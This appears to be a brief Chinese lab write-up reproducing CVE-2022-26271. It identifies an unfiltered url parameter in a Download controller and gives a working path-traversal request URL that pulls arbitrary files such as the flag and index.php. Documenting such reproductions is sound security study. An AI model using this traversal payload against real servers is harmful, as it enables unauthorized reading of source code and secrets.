当前位置: 首页 > news >正文

CVE-2022-26271

news 2026/3/27 5:17:32

CVE-2022-26271复现
image
漏洞分析
在\upload\application\index\controller\Download.php里面有一个文件操作函数,其中$url是用户可控制参数,没有过滤,$ourput_filename是要输出的文件名
image
构造payload:
https://eci-2zegg56pa08ql8s0k42t.cloudeci1.ichunqiu.com/index/download/index?name=index.php&url=../../../../../../../flag
页面会自动下载index.php文件,
image

http://www.jsqmd.com/news/53283/

相关文章:

  • MySQL性能分析(六)之Performance Schema监控SQL性能
  • js控制并发请求
  • Windows Update - Part 2: Update Package - Appendix
  • Azure app service 和 Azure container app 的对比以及技术选型
  • Nestjs框架: 微服务与分布式架构解析之核心概念、应用场景与技术挑战 - 指南
  • 嗯欧哀批2025有机 - Gon
  • GitPulse:让代码的故事自己讲述
  • 图书馆管理系统Alpha阶段Scrum冲刺博客 Day1
  • 工具-一套键鼠控制两台电脑
  • 企业微信HTTP协议调用,逆向开发,本地化部署
  • 20251127周四日记
  • 【第一周:Python 测试开发核心错题集 避坑指南】
  • 空间够造+花钱够省!红旗HS6霸榜家用大五座混动推荐
  • 搜维尔科技:为什么选择Xsens动作捕捉作为人形机器人解决方案?
  • 题解:P13266 [GCJ 2014 Finals] Symmetric Trees
  • python---深拷贝浅拷贝
  • 解决ARM Linux下使用PlatformIO 找不到编译工具链toolchain报错
  • 搜维尔科技:新一代Xsens Link动作捕捉系统,非常适合实时机器人远程操控、虚拟制作和现场演出录制
  • 解决VirtualBox - Error In supR3HardenedWinReSpawn报错
  • 1127随笔
  • 大规模微服务强大的系统中的雪崩故障防治
  • flutter 生命周期管理:从 Widget 到 State 的完整解析 - 指南
  • gradle的各个环境依赖jar包的同一个版本导致的严重后果
  • 20251127
  • Day26字体图标--上传矢量图
  • 从零开始:用Python和Gemini 3四步搭建你自己的AI Agent
  • 双特异性抗体:抗癌 “双面手”,两种模式精准杀伤癌细胞
  • 机器翻译模型跨领域自适应技术解析
  • 高级程序语言第七次作业
  • windows和linux下jar包graalvm打包生native程序 - yebinghuai-qq